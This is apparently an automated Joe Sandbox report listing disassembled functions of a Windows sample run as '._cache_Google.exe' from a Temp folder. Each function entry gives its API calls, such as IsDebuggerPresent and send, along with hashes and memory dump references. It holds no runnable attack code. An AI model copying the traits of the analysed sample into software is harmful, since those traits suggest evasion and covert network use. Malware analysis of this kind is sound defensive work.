                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                                      • API String ID: 1029625771-2684727018
                                                                                                                                                                                      • Opcode ID: 93d93d6710ea341602127871c684f4aa5115df779de73d302f4a7b765dbc6d0e
                                                                                                                                                                                      • Instruction ID: c463fe42d728b2a29a67c954916b5a10996cf226c74db20f7b7b480ca0012db5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93d93d6710ea341602127871c684f4aa5115df779de73d302f4a7b765dbc6d0e
                                                                                                                                                                                      • Instruction Fuzzy Hash: EFF0687190120DAECF15EFB4D8919FFB77CAA50310B10C526E815920D2EB749B09DB20
                                                                                                                                                                                      Function 0097813B Relevance: 3.2, APIs: 2, Instructions: 212COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                      • Opcode ID: 9a5695fa7a5f7aacf0498972cff8d07f1678063623683381b01d163f45eebf4c
                                                                                                                                                                                      • Instruction ID: f990e1f66fc9f5fdbcd8d2a956e8c435ecda0ec80be71239d73bc2a58d8d9d6a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a5695fa7a5f7aacf0498972cff8d07f1678063623683381b01d163f45eebf4c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C819B75A0420A9BCB20DF58D880AE9F7B9FF44310F64C469E859AB364D735EDD2CB80
                                                                                                                                                                                      Function 0091F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0e6921338d2780c74538f0a4558c91279eb7d2ded88907d920303abef395ccae
                                                                                                                                                                                      • Instruction ID: b748b7b4e0fca0915ec5a1e3c609f88311234eb63add92ab434bb3ed43dfbe23
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e6921338d2780c74538f0a4558c91279eb7d2ded88907d920303abef395ccae
                                                                                                                                                                                      • Instruction Fuzzy Hash: B051C5717047059FCB14EF28D491BAA73E9AF88310F14856DF99A8B2D2CB30EC45CB92
                                                                                                                                                                                      Function 00958065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00958074
                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0095807A
                                                                                                                                                                                        • Part of subcall function 00956B19: GetWindowRect.USER32(?,?), ref: 00956B2C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CursorForegroundRect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1066937146-0
                                                                                                                                                                                      • Opcode ID: a3a43d5424a108999c7a99532b06fed102d9a43e0f045d4371c48106f3d5f571
                                                                                                                                                                                      • Instruction ID: 520976d21999edcf20fb1d213b64dc816966d4d28ec31d61ec78c8202107e7e7
                                                                                                                                                                                      • Opcode Fuzzy Hash: a3a43d5424a108999c7a99532b06fed102d9a43e0f045d4371c48106f3d5f571
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF314DB5A00208AFDB00EFA5DC81BEEB7B9FF44314F50442AE956B7251DB34AE55CB90
                                                                                                                                                                                      Function 00901DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 0097DB31
                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 0097DB6B
                                                                                                                                                                                        • Part of subcall function 00901F04: GetForegroundWindow.USER32 ref: 00901FBE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Foreground
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 62970417-0
                                                                                                                                                                                      • Opcode ID: 926ec357b4d836a1d4b5ee4ee8a85177a9bf4eaa5787de0a45e5fdebc93804fb
                                                                                                                                                                                      • Instruction ID: b24e03c67bcad7daf48dd4bbc4ea0fabab0d6dcdc6e35642e4fe86879b9b72fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 926ec357b4d836a1d4b5ee4ee8a85177a9bf4eaa5787de0a45e5fdebc93804fb
                                                                                                                                                                                      • Instruction Fuzzy Hash: EE21AC72600206AFDB21AB74C881FFE77BD9F81784F014429F95AC7191DB74EE019760
                                                                                                                                                                                      Function 0093E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00901952
                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0093E344
                                                                                                                                                                                      • _strlen.LIBCMT ref: 0093E34F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Timeout_strlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2777139624-0
                                                                                                                                                                                      • Opcode ID: bb8e4fe87b3b5961e5db3c5742fa91e569fbadf16e70fe43200c423511c96afe
                                                                                                                                                                                      • Instruction ID: f5280cc8b0046ae04c020352cc90691ac429683d76cbca13c454f01e7a3ef831
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb8e4fe87b3b5961e5db3c5742fa91e569fbadf16e70fe43200c423511c96afe
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC11A3316042156BDB04BBA8EC86ABE7BAD9F85740F004439F606DB1E3DE649C469BA0
                                                                                                                                                                                      Function 00903682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 009036E6
                                                                                                                                                                                        • Part of subcall function 00922025: __lock.LIBCMT ref: 0092202B
                                                                                                                                                                                        • Part of subcall function 009032DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009032F6
                                                                                                                                                                                        • Part of subcall function 009032DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0090330B
                                                                                                                                                                                        • Part of subcall function 0090374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0090376D
                                                                                                                                                                                        • Part of subcall function 0090374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0090377F
                                                                                                                                                                                        • Part of subcall function 0090374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,009C1120,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,009C1124,?,?), ref: 009037EE
                                                                                                                                                                                        • Part of subcall function 0090374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00903860
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00903726
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 924797094-0
                                                                                                                                                                                      • Opcode ID: ae8d725e0be2028f24f3e0ba30d179051d1dc0567ed2155fa56727b0e98c4698
                                                                                                                                                                                      • Instruction ID: 65488b8383e582602e1b813de6bbd45722c97606cdc194fb64c17c1d410ea46c
                                                                                                                                                                                      • Opcode Fuzzy Hash: ae8d725e0be2028f24f3e0ba30d179051d1dc0567ed2155fa56727b0e98c4698
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C118E719183459FC300EF29D845A1ABBE9FFC5750F00451EF444872A2DB749984DB96
                                                                                                                                                                                      Function 00904B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00904C2B,?,?,?,?,0090BE63), ref: 00904BB6
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00904C2B,?,?,?,?,0090BE63), ref: 00974972
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: 98baca7c79b1a25f7c4676f3718822cde3a3499bcf6ce3972e9e49983e88f4d9
                                                                                                                                                                                      • Instruction ID: eb11c9db97cae4b20183c2437de84f4e7ab3ef75238bcddae736bff731304c36
                                                                                                                                                                                      • Opcode Fuzzy Hash: 98baca7c79b1a25f7c4676f3718822cde3a3499bcf6ce3972e9e49983e88f4d9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 740192B0288308BEF7244E24CCCAF6A7BDCEB05768F108719BBE45A1E1C6B49C448B50
                                                                                                                                                                                      Function 0091F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0094AEA5,?,?,00000000,00000008), ref: 0091F282
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0094AEA5,?,?,00000000,00000008), ref: 0091F2A6
                                                                                                                                                                                        • Part of subcall function 0091F2D0: _memmove.LIBCMT ref: 0091F307
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3033907384-0
                                                                                                                                                                                      • Opcode ID: c71bbdf4221043c017978f4caecbc627f9bfbdb996c2ef81268711c7e8c482de
                                                                                                                                                                                      • Instruction ID: 1abd1a20c406f9e6eeb3cb09f7b18146072a10e1bab25e8d46a1b40bac89563a
                                                                                                                                                                                      • Opcode Fuzzy Hash: c71bbdf4221043c017978f4caecbc627f9bfbdb996c2ef81268711c7e8c482de
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF04FB6219118BFAB10AB65EC48DBB7FADEF8A3A07408426FD18CA151CA35DC509770
                                                                                                                                                                                      Function 0092F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___lock_fhandle.LIBCMT ref: 0092F7D9
                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 0092F7F2
                                                                                                                                                                                        • Part of subcall function 0092886A: __getptd_noexit.LIBCMT ref: 0092886A
                                                                                                                                                                                        • Part of subcall function 0092889E: __getptd_noexit.LIBCMT ref: 0092889E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1046115767-0
                                                                                                                                                                                      • Opcode ID: b890f324717ed4a9aac654c9f6f6f4d7b50057e538b6aeb96208e905e47277d3
                                                                                                                                                                                      • Instruction ID: 55800824ceb41daa0db43d4d780ce8465e8bab4ada44603ef69f237e98878863
                                                                                                                                                                                      • Opcode Fuzzy Hash: b890f324717ed4a9aac654c9f6f6f4d7b50057e538b6aeb96208e905e47277d3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11C272C066708ED7117FB4B852359B6B45FC1331F550770E5316F2EACBB8594087A1
                                                                                                                                                                                      Function 009034F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0090352A
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 009766C0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 257928180-0
                                                                                                                                                                                      • Opcode ID: 3e788ac4d2e5472fa3ab8dc7f154f9cc9c76986daf44d7699d0fbb6a2c682cd8
                                                                                                                                                                                      • Instruction ID: ea2fbaa24c345e28b90e3f64bd2ee41ce22f69247063f7bc3c127c1234fc7346
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e788ac4d2e5472fa3ab8dc7f154f9cc9c76986daf44d7699d0fbb6a2c682cd8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01A13590420C9ECB14EBA4DC45FD973ECAF64748F0081A5B519D31F1EA309B858B91
                                                                                                                                                                                      Function 00959500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 00959534
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000,?,00000000,00000000), ref: 00959557
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastsend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1802528911-0
                                                                                                                                                                                      • Opcode ID: 8294b4e3b135d9b4b6df9aba9ba95d712ac9c72f1067a9c0601c3f96c1cb7ac9
                                                                                                                                                                                      • Instruction ID: 8a6b66e981bc1f0f560c40186348f8508f375af6026b7a04be1234ea420e9a8f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8294b4e3b135d9b4b6df9aba9ba95d712ac9c72f1067a9c0601c3f96c1cb7ac9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A012C752042009FD710EB68D891F6AB7E9EFD9721F108529FA5A87391DA74EC05CB90
                                                                                                                                                                                      Function 0092010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009245EC: __FF_MSGBANNER.LIBCMT ref: 00924603
                                                                                                                                                                                        • Part of subcall function 009245EC: __NMSG_WRITE.LIBCMT ref: 0092460A
                                                                                                                                                                                        • Part of subcall function 009245EC: RtlAllocateHeap.NTDLL(01380000,00000000,00000001,?,?,?,?,00920127,?,0090125D,00000058,?,?), ref: 0092462F
                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0092013E
                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00920153
                                                                                                                                                                                        • Part of subcall function 00927495: RaiseException.KERNEL32(?,?,0090125D,009B6598,?,?,?,00920158,0090125D,009B6598,?,00000001), ref: 009274E6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3902256705-0
                                                                                                                                                                                      • Opcode ID: 2649b2b4c2eb9df437080daff42244eca10b8a95e134cef4a0aca7aba52c3ace
                                                                                                                                                                                      • Instruction ID: c0b1a78abbd20a6367d315091f363caad3e30325847039380b576ab5262b3c0c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2649b2b4c2eb9df437080daff42244eca10b8a95e134cef4a0aca7aba52c3ace
                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF0A43510823DB6CB25BBE8F802AEEB7ECAF84354F100415F904A61D7DBB096A097A5
                                                                                                                                                                                      Function 00924274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0092889E: __getptd_noexit.LIBCMT ref: 0092889E
                                                                                                                                                                                      • __lock_file.LIBCMT ref: 009242B9
                                                                                                                                                                                        • Part of subcall function 00925A9F: __lock.LIBCMT ref: 00925AC2
                                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 009242C4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2800547568-0
                                                                                                                                                                                      • Opcode ID: 49cb08412528854ed11c5b710827b9c234bff8a28f6d10de389980582a70e073
                                                                                                                                                                                      • Instruction ID: 6e56a9fac066b539185e38e1084a2f25a79d61577294276f80cc73d63222fe92
                                                                                                                                                                                      • Opcode Fuzzy Hash: 49cb08412528854ed11c5b710827b9c234bff8a28f6d10de389980582a70e073
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF0B431901734DAD710ABB6A80276EA7E46FC0334F218609B834AB1C9CB7C99019B51
